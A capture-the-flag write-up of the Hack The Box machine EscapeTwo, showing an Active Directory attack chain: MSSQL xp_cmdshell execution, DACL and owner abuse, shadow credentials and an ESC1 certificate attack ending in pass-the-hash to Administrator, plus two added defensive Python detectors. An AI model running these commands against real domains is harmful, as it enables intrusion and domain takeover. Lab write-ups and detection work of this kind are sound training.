EscapeTwo-HTB

Information Gathering

First, run an nmap scan with nmap -sV -sC -O 10.10.11.51; the results are as follows:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-29 15:03 CST
Nmap scan report for 10.10.11.51
Host is up (2.3s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-29 07:05:45Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-29T07:09:29+00:00; -1s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-29T07:09:26+00:00; 0s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.10.11.51:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.10.11.51:1433:
| Target_Name: SEQUEL
| NetBIOS_Domain_Name: SEQUEL
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: DC01.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-28T20:40:08
|_Not valid after: 2055-01-28T20:40:08
|_ssl-date: 2025-01-29T07:09:29+00:00; -1s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-29T07:09:29+00:00; -1s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-29T07:09:26+00:00; 0s from scanner time.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-01-29T07:08:47
|_ start_date: N/A
|_clock-skew: mean: -1s, deviation: 0s, median: -1s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 386.20 seconds

We can see that an SMB service and an MSSQL database service are exposed.
Use smbmap to check share permissions: smbmap -u rose -p 'KxEPkKe6R8su' -H 10.10.11.51

Let's see what is in the Accounting Department share.

There are two spreadsheets; download them and take a look.

Exploitation

The spreadsheets contain account credentials. Since the MSSQL port is open, the idea is to abuse xp_cmdshell; others have shown that netexec can execute commands this way. First, check the privileges:
nxc mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth --list

This account already has admin privileges, so no further escalation is needed, but the privilege-escalation command is recorded here anyway:
nxc mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth --module mssql_priv
Next, execute commands; the -x parameter runs them through xp_cmdshell:
nxc mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth -x 'whoami'

The command executes successfully; now read the configuration file:

nxc mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth -x 'type C:\SQL2019\ExpressAdv_enu\sql-Configuration.INI'
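From the defender's side, the sa login with --local-auth and the subsequent -x commands above leave two distinct traces in the SQL Server ERRORLOG: a successful SQL-authenticated login as sa from a remote client, and the sp_configure message that records xp_cmdshell being enabled. The following Python detector is an added example, not part of the writeup or of netexec; the log lines are constructed, following the standard ERRORLOG message formats, and the address 10.10.14.5 is an assumed attacker client.

```python
import re

# Constructed SQL Server ERRORLOG excerpt (not captured from the box).
# "Login succeeded" lines are only written when login auditing includes successful logins;
# the "Configuration option ... changed" lines are written whenever sp_configure is used.
SAMPLE_ERRORLOG = """\
2025-01-29 07:09:58.11 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 10.10.14.5]
2025-01-29 07:10:01.23 spid56      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2025-01-29 07:10:01.40 spid56      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2025-01-29 07:15:12.02 Logon       Login succeeded for user 'SEQUEL\\svc_reporting'. Connection made using Windows authentication. [CLIENT: 10.10.11.20]
2025-01-29 07:20:30.77 spid61      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""

LOGIN_RE = re.compile(
    r"^(?P<ts>\S+ \S+) +Logon +Login succeeded for user '(?P<user>[^']+)'\. "
    r"Connection made using (?P<method>SQL Server|Windows) authentication\. \[CLIENT: (?P<client>[^\]]+)\]"
)
CONFIG_RE = re.compile(
    r"^(?P<ts>\S+ \S+) +(?P<spid>spid\d+) +Configuration option '(?P<option>[^']+)' "
    r"changed from (?P<old>\d+) to (?P<new>\d+)\."
)

def analyze_errorlog(text, local_clients=("127.0.0.1", "<local machine>")):
    """Return a list of (timestamp, severity, message) findings, in log order."""
    findings = []
    for line in text.splitlines():
        m = LOGIN_RE.match(line)
        if m:
            # Remote SQL-auth logins as 'sa' are the pattern netexec --local-auth produces.
            if m["method"] == "SQL Server" and m["user"].lower() == "sa" and m["client"] not in local_clients:
                findings.append((m["ts"], "high", f"remote SQL-auth login as 'sa' from {m['client']}"))
            continue
        m = CONFIG_RE.match(line)
        # Only the transition to 1 (enabled) is a finding; disabling it is the expected hardening step.
        if m and m["option"] == "xp_cmdshell" and m["new"] == "1":
            findings.append((m["ts"], "critical", f"xp_cmdshell enabled by {m['spid']}"))
    return findings

if __name__ == "__main__":
    for ts, sev, msg in analyze_errorlog(SAMPLE_ERRORLOG):
        print(ts, sev.upper(), msg)
```

The constructed excerpt yields exactly two findings: the remote sa login and the xp_cmdshell enablement; the later change back to 0 is not flagged.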

The file contains a username and password. Trying to log in over WinRM with them directly fails because the password is wrong, so check which other users exist.

Try logging in as ryan.

The login succeeds; read the flag.

Internal Enumeration

Use bloodhound-python to collect domain information:
bloodhound-python -u 'ryan' -p 'WqSZAF6CysDQbGb3' -d sequel.htb -ns 10.10.11.51 -c All

We can see that ryan has the WriteOwner right over the CA_SVC user. This right allows a user or group to change the owner of the object.

CA_SVC is the certificate publisher, so the plan is to change the owner of this user to ryan.

Exploitation

A certificate template vulnerable to ESC1 allows low-privileged users to enroll and request certificates on behalf of any domain object the user specifies. This means any user with enrollment rights can request a certificate for a privileged account, such as a Domain Admin.
References:
https://www.cnblogs.com/cyyyyi/p/17797616.html
https://whoamianony.top/posts/attack-surface-mining-for-ad-cs/

bloodyAD --host 10.10.11.51 -d sequel.htb -u ryan -p WqSZAF6CysDQbGb3 set owner CA_SVC ryan

Then modify the DACL of CA_SVC (a DACL is a specific type of ACL used to manage object access in Windows. It is part of the object's security descriptor and defines which users or groups have which access rights to the object. Each ACE (access control entry) in the DACL specifies the permissions of a particular user or group.)
Using impacket-dacledit:
impacket-dacledit -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' 'sequel.htb'/"ryan":"WqSZAF6CysDQbGb3"

certipy-ad generates new key credentials (shadow credentials) for the account, enabling certificate-based authentication; the saved ccache file can then be used for Kerberos attacks.
certipy-ad shadow auto -u 'ryan@sequel.htb' -p "WqSZAF6CysDQbGb3" -account 'ca_svc' -dc-ip '10.10.11.51' -target dc01.sequel.htb -ns 10.10.11.51

Modify the certificate template so it can be used for privilege escalation, allowing certificates to be issued with elevated privileges:
KRB5CCNAME=$PWD/ca_svc.ccache certipy-ad template -k -template DunderMifflinAuthentication -target dc01.sequel.htb -dc-ip 10.10.11.51

Request a certificate with the UPN (User Principal Name) Administrator@sequel.htb, which allows authenticating as the Administrator account:
certipy-ad req -u ca_svc -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -ca sequel-DC01-CA -target dc01.sequel.htb -dc-ip 10.10.11.51 -template DunderMifflinAuthentication -upn Administrator@sequel.htb -ns 10.10.11.51 -dns 10.10.11.51

Retrieve the Administrator NTLM hash using the certificate:

certipy-ad auth -pfx administrator_10.pfx -dc-ip 10.10.11.51
With the hash obtained, log in directly via WinRM:
evil-winrm -i 10.10.11.51 -u administrator -H "7a8d4e04986afa8ed4060f75e5a0b3ff"
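The chain above works because, after the template change, DunderMifflinAuthentication meets every ESC1 condition at once: it is published, it lets the enrollee supply the subject (so an arbitrary UPN can be requested), it needs no manager approval or authorized signatures, it carries a client-authentication EKU, and low-privileged principals may enroll. The Python audit below is an added example (not from the writeup, certipy or any other tool) that evaluates those conditions over the template attributes as stored in AD; the template records are constructed for the example, with DunderMifflinAuthentication shown in an ESC1-vulnerable state like the one the writeup creates, and the attribute values are assumptions.

```python
# ESC1 conditions evaluated from the AD attributes of certificate templates
# (objects under CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,...).
ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT in msPKI-Certificate-Name-Flag
PEND_ALL_REQUESTS = 0x00000002           # manager-approval bit in msPKI-Enrollment-Flag
CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",        # Client Authentication
    "1.3.6.1.5.2.3.4",          # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",   # Smart Card Logon
    "2.5.29.37.0",              # Any Purpose
}
LOW_PRIV_PRINCIPALS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}

# Constructed template records (assumed values, not read from the box's CA).
CONSTRUCTED_TEMPLATES = [
    {"name": "DunderMifflinAuthentication", "enabled": True,
     "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0, "msPKI-RA-Signature": 0,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "enroll": ["Domain Users", "Cert Publishers"]},
    {"name": "User", "enabled": True,   # subject built from AD, so not ESC1
     "msPKI-Certificate-Name-Flag": 0xA6000000, "msPKI-Enrollment-Flag": 0x29, "msPKI-RA-Signature": 0,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "enroll": ["Domain Users"]},
    {"name": "ManagerApproved", "enabled": True,   # approval gate blocks ESC1
     "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x2, "msPKI-RA-Signature": 0,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "enroll": ["Domain Users"]},
]

def esc1_findings(templates, low_priv=LOW_PRIV_PRINCIPALS):
    """Return {template_name: [low-privileged principals that can enroll]} for ESC1-vulnerable templates."""
    out = {}
    for t in templates:
        ekus = set(t.get("pKIExtendedKeyUsage", []))
        conditions = [
            t.get("enabled", False),
            bool(t["msPKI-Certificate-Name-Flag"] & ENROLLEE_SUPPLIES_SUBJECT),
            not (t["msPKI-Enrollment-Flag"] & PEND_ALL_REQUESTS),
            t.get("msPKI-RA-Signature", 0) == 0,
            not ekus or bool(ekus & CLIENT_AUTH_EKUS),   # an empty EKU list permits any purpose
        ]
        weak_enrollers = sorted(set(t["enroll"]) & low_priv)
        if all(conditions) and weak_enrollers:
            out[t["name"]] = weak_enrollers
    return out

if __name__ == "__main__":
    for name, who in esc1_findings(CONSTRUCTED_TEMPLATES).items():
        print(f"ESC1: {name} enrollable by {', '.join(who)}")
```

Fixing any one of the flagged conditions (clearing the enrollee-supplies-subject flag, requiring manager approval, or removing the low-privileged enrollment ACE) takes the template out of the result set.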

References:
https://natro92.fun/posts/cbb1724c/#Administrator
https://www.hyhforever.top/htb-escapetwo/